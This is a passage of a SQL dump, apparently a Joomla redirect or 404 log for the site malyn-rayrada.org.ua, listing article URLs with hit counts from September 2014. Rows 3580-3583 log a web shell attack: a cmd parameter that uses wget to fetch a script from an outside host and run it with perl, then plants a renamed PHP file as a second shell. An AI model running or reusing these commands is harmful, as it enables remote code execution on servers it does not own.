00:33:34','0000-00-00 00:00:00',301),(3521,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1181:2014-01-22-06-06-13&catid=11&lang=uk','','','',5,0,'2014-09-21 00:33:40','0000-00-00 00:00:00',301),(3522,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:-21022013-&Itemid=86&lang=uk','','','',6,0,'2014-09-21 00:34:36','0000-00-00 00:00:00',301),(3523,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53:--25102013-&Itemid=94&lang=uk','','','',14,0,'2014-09-21 00:35:26','0000-00-00 00:00:00',301),(3524,'http://malyn-rayrada.org.ua/index.php?option=com_phocagallery&view=category&id=2&Itemid=1&lang=en','','','',4,0,'2014-09-21 00:35:58','0000-00-00 00:00:00',301),(3525,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',11,0,'2014-09-21 00:37:10','0000-00-00 00:00:00',301),(3526,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1222:2014-02-22-10-52-44&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',7,0,'2014-09-21 00:38:31','0000-00-00 00:00:00',301),(3527,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47&Itemid=86&lang=en','','','',1,0,'2014-09-21 00:39:05','0000-00-00 00:00:00',301),(3528,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1315:-31-6-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',7,0,'2014-09-21 00:39:56','0000-00-00 00:00:00',301),(3529,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1283:2014-04-15-16-30-00&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-21 00:41:08','0000-00-00 00:00:00',301),(3530,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1340:-l-28r&catid=59&Itemid=107&lang=en','','','',5,0,'2014-09-21 00:41:49','0000-00-00 00:00:00',301),(3531,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1330:2014-06-03-06-17-00&catid=11&Itemid=14&lang=uk','','','',13,0,'2014-09-21 00:42:20','0000-00-00 00:00:00',301),(3532,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1320:--------15--2010---12-l----r&catid=36:2011-07-21-07-51-53&Itemid=70&lang=uk','','','',8,0,'2014-09-21 00:42:21','0000-00-00 00:00:00',301),(3533,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-21 00:42:52','0000-00-00 00:00:00',301),(3534,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1074:2013-09-02-05-02-30&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-21 00:46:25','0000-00-00 00:00:00',301),(3535,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1114:-lr-&catid=53:--25102013-&Itemid=94&lang=en','','','',10,0,'2014-09-21 00:47:26','0000-00-00 00:00:00',301),(3536,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53&Itemid=94&lang=en','','','',2,0,'2014-09-21 00:47:48','0000-00-00 00:00:00',301),(3537,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1112:2013-10-23-09-24-43&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-21 00:49:13','0000-00-00 00:00:00',301),(3538,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54&Itemid=95&lang=ru','','','',2,0,'2014-09-21 00:49:16','0000-00-00 00:00:00',301),(3539,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-21 00:49:19','0000-00-00 00:00:00',301),(3540,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1252:2014-03-24-17-19-07&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-21 00:50:38','0000-00-00 00:00:00',301),(3541,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=en&Itemid=','','','',2,0,'2014-09-21 00:51:17','0000-00-00 00:00:00',301),(3542,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1089:-l-r-&catid=53:--25102013-&Itemid=94&lang=en','','','',3,0,'2014-09-21 00:54:34','0000-00-00 00:00:00',301),(3543,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1301:-28-&catid=11&lang=ru&Itemid=0','','','',2,0,'2014-09-21 00:55:32','0000-00-00 00:00:00',301),(3544,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 00:55:33','0000-00-00 00:00:00',301),(3545,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1068:-22-&catid=15&lang=en&Itemid=0','','','',3,0,'2014-09-21 00:56:19','0000-00-00 00:00:00',301),(3546,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1346:2014-06-18-11-51-53&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 01:01:57','0000-00-00 00:00:00',301),(3547,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:-l-r-&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-21 01:03:02','0000-00-00 00:00:00',301),(3548,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-21 01:04:14','0000-00-00 00:00:00',301),(3549,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=937:---------------------------21122012--l--&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-21 01:05:32','0000-00-00 00:00:00',301),(3550,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=uk&Itemid=','','','',2,0,'2014-09-21 01:13:37','0000-00-00 00:00:00',301),(3551,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56:--03022014-&Itemid=97&lang=ru','','','',4,0,'2014-09-21 01:20:08','0000-00-00 00:00:00',301),(3552,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=ru&Itemid=','','','',3,0,'2014-09-21 01:22:56','0000-00-00 00:00:00',301),(3553,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=976:2013-03-21-18-42-06&catid=11&lang=en&Itemid=','','','',1,0,'2014-09-21 01:24:06','0000-00-00 00:00:00',301),(3554,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53:--25102013-&Itemid=94&lang=ru','','','',2,0,'2014-09-21 01:31:45','0000-00-00 00:00:00',301),(3555,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',2,0,'2014-09-21 01:33:09','0000-00-00 00:00:00',301),(3556,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 01:35:11','0000-00-00 00:00:00',301),(3557,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1099:-l-r&catid=53&Itemid=94&lang=ru','','','',1,0,'2014-09-21 01:35:48','0000-00-00 00:00:00',301),(3558,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1071:2013-08-27-14-06-18&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 01:36:21','0000-00-00 00:00:00',301),(3559,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:--------l--r------&catid=47:--21022013-&Itemid=86&lang=en','','','',1,0,'2014-09-21 01:38:09','0000-00-00 00:00:00',301),(3560,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1098:2013-09-25-09-34-57&catid=11&Itemid=14&lang=ru','','','',6,0,'2014-09-21 01:39:10','0000-00-00 00:00:00',301),(3561,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1128:2013-11-06-13-04-56&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 01:39:33','0000-00-00 00:00:00',301),(3562,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1174:------2013-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-21 01:39:59','0000-00-00 00:00:00',301),(3563,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1213:2014-02-14-13-53-12&catid=11&Itemid=14&lang=ru','','','',4,0,'2014-09-21 01:40:39','0000-00-00 00:00:00',301),(3564,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1079:------l---2011-2013-r&catid=36&Itemid=70&lang=en','','','',2,0,'2014-09-21 01:41:09','0000-00-00 00:00:00',301),(3565,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=954:-19-6-&catid=11&lang=en&Itemid=0','','','',2,0,'2014-09-21 01:46:46','0000-00-00 00:00:00',301),(3566,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:-lr-&catid=59&Itemid=107&lang=en','','','',7,0,'2014-09-21 01:47:57','0000-00-00 00:00:00',301),(3567,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=984:-20-&catid=11&lang=uk','','','',6,0,'2014-09-21 01:48:16','0000-00-00 00:00:00',301),(3568,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-21 01:50:25','0000-00-00 00:00:00',301),(3569,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58:--30042014-&Itemid=105&lang=ru','','','',12,0,'2014-09-21 01:51:34','0000-00-00 00:00:00',301),(3570,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1274:-l-r&catid=57:--15042014-&Itemid=98&lang=ru','','','',3,0,'2014-09-21 01:55:29','0000-00-00 00:00:00',301),(3571,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&lang=en&Itemid=','','','',4,0,'2014-09-21 01:55:37','0000-00-00 00:00:00',301),(3572,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:-21022013-&Itemid=86&lang=en','','','',7,0,'2014-09-21 01:56:52','0000-00-00 00:00:00',301),(3573,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=ru&Itemid=0','','','',4,0,'2014-09-21 01:57:01','0000-00-00 00:00:00',301),(3574,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1305:-30----&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 02:02:00','0000-00-00 00:00:00',301),(3575,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53:--25102013-&Itemid=94&lang=uk','','','',2,0,'2014-09-21 02:03:05','0000-00-00 00:00:00',301),(3576,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 02:09:13','0000-00-00 00:00:00',301),(3577,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1354:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-21 02:10:21','0000-00-00 00:00:00',301),(3578,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=36&Itemid=70&lang=en','','','',4,0,'2014-09-21 02:13:18','0000-00-00 00:00:00',301),(3579,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56:--03022014-&Itemid=97&lang=uk','','','',3,0,'2014-09-21 02:17:41','0000-00-00 00:00:00',301),(3580,'http://malyn-rayrada.org.ua/images/stories/localhosts.php?selem','','','',1,0,'2014-09-21 02:19:47','0000-00-00 00:00:00',301),(3581,'http://malyn-rayrada.org.ua/images/stories/localhosts.php?cmd=wget http://canadaimmigration-visa.com/components/com_admin/controllers/robot.txt;perl robot.txt;perl robot.txt;perl robot.txt;perl robot.txt;perl robot.txt;rm -fr robot.txt','','','',1,0,'2014-09-21 02:20:03','0000-00-00 00:00:00',301),(3582,'http://malyn-rayrada.org.ua/images/stories/localhosts.php?cmd=wget http://canadaimmigration-visa.com/components/com_admin/controllers/canz.jpg;mv canz.jpg canz.php;rm -fr canz.*','','','',1,0,'2014-09-21 02:20:28','0000-00-00 00:00:00',301),(3583,'http://malyn-rayrada.org.ua/images/stories/canz.php','','','',3,0,'2014-09-21 02:20:37','0000-00-00 00:00:00',301),(3584,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1011:2013-05-29-09-51-28&catid=11&lang=uk&Itemid=0','','','',4,0,'2014-09-21 02:25:15','0000-00-00 00:00:00',301),(3585,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=47:--21022013-&Itemid=86&lang=en','','','',6,0,'2014-09-21 02:29:34','0000-00-00 00:00:00',301),(3586,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1237:-200-&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-21 02:30:20','0000-00-00 00:00:00',301),(3587,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1044:2013-07-05-11-26-05&catid=51:--19072013-&Itemid=92&lang=en','','','',1,0,'2014-09-21 02:34:41','0000-00-00 00:00:00',301),(3588,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1032:-l-r-2012-2015-&catid=51:--19072013-&Itemid=92&lang=ru','','','',3,0,'2014-09-21 02:35:14','0000-00-00 00:00:00',301),(3589,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1056:-22-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',5,0,'2014-09-21 02:37:20','0000-00-00 00:00:00',301),(3590,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1121:-24-6-&catid=11&lang=ru','','','',4,0,'2014-09-21 02:41:17','0000-00-00 00:00:00',301),(3591,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1129:2013-11-06-13-36-25&catid=11&lang=ru','','','',4,0,'2014-09-21 02:41:56','0000-00-00 00:00:00',301),(3592,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1110:-9-2013-&catid=11&lang=ru','','','',5,0,'2014-09-21 02:43:19','0000-00-00 00:00:00',301),(3593,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1309:-2014-&catid=58:--30042014-&Itemid=105&lang=en','','','',28,0,'2014-09-21 02:44:44','0000-00-00 00:00:00',301),(3594,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1376:2014-08-22-08-01-53&catid=11&Itemid=14&lang=ru','','','',14,0,'2014-09-21 02:47:39','0000-00-00 00:00:00',301),(3595,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=907:2013-01-21-08-54-59&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',2,0,'2014-09-21 02:48:11','0000-00-00 00:00:00',301),(3596,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1093:-2017-&catid=53&Itemid=94&lang=ru','','','',2,0,'2014-09-21 02:54:12','0000-00-00 00:00:00',301),(3597,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1372:2014-08-04-19-26-16&catid=11&Itemid=14&lang=en','','','',106,0,'2014-09-21 02:55:53','0000-00-00 00:00:00',301),(3598,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1343:2014-06-14-17-26-47&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',14,0,'2014-09-21 03:00:35','0000-00-00 00:00:00',301),(3599,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1197:-l-r-&catid=56&Itemid=97&lang=ru','','','',3,0,'2014-09-21 03:01:39','0000-00-00 00:00:00',301),(3600,'http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11:2010-06-05-14-33-33&id=1130:2013-11-07-14-04-12&lang=uk&option=com_content&view=article','','http://www.malyn-rayrada.org.ua/index.php?Itemid=14&catid=11%3A2010-06-05-14-33-33&id=1130%3A2013-11-07-14-04-12&lang=uk&option=com_content&view=artic','',3,0,'2014-09-21 03:17:05','0000-00-00 00:00:00',301),(3601,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=category&layout=blog&id=7&Itemid=12&lang=uk','','','',2,0,'2014-09-21 03:29:37','0000-00-00 00:00:00',301),(3602,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1208:2014-01-31-13-48-49&catid=11&lang=uk','','','',5,0,'2014-09-21 03:31:35','0000-00-00 00:00:00',301),(3603,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1118:2013-10-25-12-24-30&catid=53:--25102013-&Itemid=94&lang=en','','','',6,0,'2014-09-21 03:36:04','0000-00-00 00:00:00',301),(3604,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1075:2013-09-06-09-25-33&catid=11&lang=en','','','',3,0,'2014-09-21 03:41:43','0000-00-00 00:00:00',301),(3605,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1164:2013-12-29-11-46-36&catid=11&lang=uk&Itemid=','','','',7,0,'2014-09-21 03:42:33','0000-00-00 00:00:00',301),(3606,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1303:2014-04-29-13-13-18&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-21 03:43:13','0000-00-00 00:00:00',301),(3607,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1212:2014-02-07-07-01-38&catid=11&lang=ru&Itemid=','','','',2,0,'2014-09-21 03:43:16','0000-00-00 00:00:00',301),(3608,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46&Itemid=85&lang=uk','','','',3,0,'2014-09-21 03:52:06','0000-00-00 00:00:00',301),(3609,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11&Itemid=14&lang=uk','','','',10,0,'2014-09-21 03:53:11','0000-00-00 00:00:00',301),(3610,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-21 03:55:42','0000-00-00 00:00:00',301),(3611,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=925:--------l--r------&catid=47:--21022013-&Itemid=86&lang=uk','','','',2,0,'2014-09-21 03:55:43','0000-00-00 00:00:00',301),(3612,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1337:2014-06-10-11-11-42&catid=11&Itemid=14&lang=uk','','','',2,0,'2014-09-21 03:55:47','0000-00-00 00:00:00',301),(3613,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-21 03:55:48','0000-00-00 00:00:00',301),(3614,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=853:2012-12-11-13-39-46&catid=32&Itemid=64&lang=uk','','','',7,0,'2014-09-21 03:58:30','0000-00-00 00:00:00',301),(3615,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1151:2013-11-28-14-54-33&catid=54:--29112013-&Itemid=95&lang=uk','','','',4,0,'2014-09-21 03:59:01','0000-00-00 00:00:00',301),(3616,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=882:2012-12-21-17-08-23&catid=46&Itemid=85&lang=en','','','',3,0,'2014-09-21 04:00:02','0000-00-00 00:00:00',301),(3617,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=878:2012-12-21-16-59-28&catid=46&Itemid=85&lang=uk','','','',4,0,'2014-09-21 04:06:44','0000-00-00 00:00:00',301),(3618,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=501:2011-12-14-13-07-32&catid=36&Itemid=70&lang=uk','','','',2,0,'2014-09-21 04:11:20','0000-00-00 00:00:00',301),(3619,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1233:2014-03-03-10-28-35&catid=11&Itemid=14&lang=en','','','',6,0,'2014-09-21 04:13:59','0000-00-00 00:00:00',301),(3620,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1059:2013-07-24-05-42-15&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',6,0,'2014-09-21 04:15:48','0000-00-00 00:00:00',301),(3621,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47&Itemid=86&lang=en','','','',2,0,'2014-09-21 04:17:57','0000-00-00 00:00:00',301),(3622,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=908:2013-01-21-08-58-40&catid=47:-21022013-&Itemid=86&lang=en','','','',3,0,'2014-09-21 04:20:04','0000-00-00 00:00:00',301),(3623,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=36&Itemid=70&lang=en','','','',3,0,'2014-09-21 04:21:33','0000-00-00 00:00:00',301),(3624,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56:--03022014-&Itemid=97&lang=en','','','',3,0,'2014-09-21 04:36:51','0000-00-00 00:00:00',301),(3625,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1369:-lr-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',5,0,'2014-09-21 04:37:41','0000-00-00 00:00:00',301),(3626,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=999:2013-04-28-05-21-05&catid=11&Itemid=14&lang=uk','','','',4,0,'2014-09-21 04:40:08','0000-00-00 00:00:00',301),(3627,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=884:2012-12-24-10-46-13&catid=11&lang=en','','','',5,0,'2014-09-21 04:41:33','0000-00-00 00:00:00',301),(3628,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1113:2013-10-23-09-26-07&catid=53:--25102013-&Itemid=94&lang=ru','','','',4,0,'2014-09-21 04:45:26','0000-00-00 00:00:00',301),(3629,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=36:2011-07-21-07-51-53&Itemid=70&lang=en','','','',3,0,'2014-09-21 04:46:03','0000-00-00 00:00:00',301),(3630,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1299:--------lr---&catid=36&Itemid=70&lang=ru','','','',1,0,'2014-09-21 04:46:47','0000-00-00 00:00:00',301),(3631,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=881:2012-12-21-17-06-15&catid=46&Itemid=85&lang=ru','','','',1,0,'2014-09-21 04:51:34','0000-00-00 00:00:00',301),(3632,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=938:---------------6612-------626-&catid=47&Itemid=86&lang=uk','','','',7,0,'2014-09-21 04:52:08','0000-00-00 00:00:00',301),(3633,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=947:-lr-2012-2015-&catid=49:--12042013-&Itemid=88&lang=ru','','','',1,0,'2014-09-21 04:52:28','0000-00-00 00:00:00',301),(3634,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',13,0,'2014-09-21 04:53:23','0000-00-00 00:00:00',301),(3635,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=957:199-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',3,0,'2014-09-21 04:53:31','0000-00-00 00:00:00',301),(3636,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=942:-19-6-&catid=11&lang=uk','','','',4,0,'2014-09-21 04:53:46','0000-00-00 00:00:00',301),(3637,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=876:2012-12-18-09-32-45&catid=46:--21122012&Itemid=85&lang=en','','','',2,0,'2014-09-21 04:55:52','0000-00-00 00:00:00',301),(3638,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10&Itemid=17&lang=ru','','','',14,0,'2014-09-21 04:57:43','0000-00-00 00:00:00',301),(3639,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36&Itemid=70&lang=ru','','','',2,0,'2014-09-21 04:59:13','0000-00-00 00:00:00',301),(3640,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=940:2013-02-21-14-02-14&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-21 05:01:24','0000-00-00 00:00:00',301),(3641,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10&Itemid=17&lang=uk','','','',6,0,'2014-09-21 05:01:31','0000-00-00 00:00:00',301),(3642,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1189:2014-01-28-09-46-45&catid=56&Itemid=97&lang=en','','','',2,0,'2014-09-21 05:01:37','0000-00-00 00:00:00',301),(3643,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10:2010-06-05-13-46-44&Itemid=17&lang=ru','','','',2,0,'2014-09-21 05:02:27','0000-00-00 00:00:00',301),(3644,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1254:-1-50&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',4,0,'2014-09-21 05:04:18','0000-00-00 00:00:00',301),(3645,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=996:2013-04-25-12-09-57&catid=10&Itemid=17&lang=en','','','',4,0,'2014-09-21 05:05:23','0000-00-00 00:00:00',301),(3646,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=978:-6612-&catid=11:2010-06-05-14-33-33&Itemid=14&lang=en','','','',2,0,'2014-09-21 05:15:46','0000-00-00 00:00:00',301),(3647,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36&Itemid=70&lang=uk','','','',4,0,'2014-09-21 05:16:05','0000-00-00 00:00:00',301),(3648,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=896:2013-01-17-07-42-35&catid=47:-21022013-&Itemid=86&lang=en','','','',2,0,'2014-09-21 05:19:07','0000-00-00 00:00:00',301),(3649,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=uk&Itemid=0','','','',3,0,'2014-09-21 05:20:31','0000-00-00 00:00:00',301),(3650,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=983:2013-04-04-11-23-57&catid=49:--12042013-&Itemid=88&lang=ru','','','',4,0,'2014-09-21 05:27:35','0000-00-00 00:00:00',301),(3651,'http://www.malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1333:2014-06-05-13-09-03&catid=11&Itemid=14&lang=uk','','','',16,0,'2014-09-21 05:31:44','0000-00-00 00:00:00',301),(3652,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=ru','','','',3,0,'2014-09-21 05:35:17','0000-00-00 00:00:00',301),(3653,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1070:2013-08-23-04-27-00&catid=11&lang=ru&Itemid=0','','','',3,0,'2014-09-21 05:50:41','0000-00-00 00:00:00',301),(3654,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1140:80-1932-33-l-r&catid=11:2010-06-05-14-33-33&Itemid=14&lang=uk','','','',2,0,'2014-09-21 05:50:59','0000-00-00 00:00:00',301),(3655,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=ru&Itemid=','','','',4,0,'2014-09-21 06:32:53','0000-00-00 00:00:00',301),(3656,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1049:2013-07-15-05-50-46&catid=11&lang=uk','','','',2,0,'2014-09-21 06:37:02','0000-00-00 00:00:00',301),(3657,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36&Itemid=70&lang=uk','','','',1,0,'2014-09-21 06:40:16','0000-00-00 00:00:00',301),(3658,'http://malyn-rayrada.org.ua/index.php?option=com_content&view=article&id=1321:------------------lr-&catid=36:2011-07-21-07-51-53&Itemid=70&lang=ru','','','',4,0,'2014-09-21 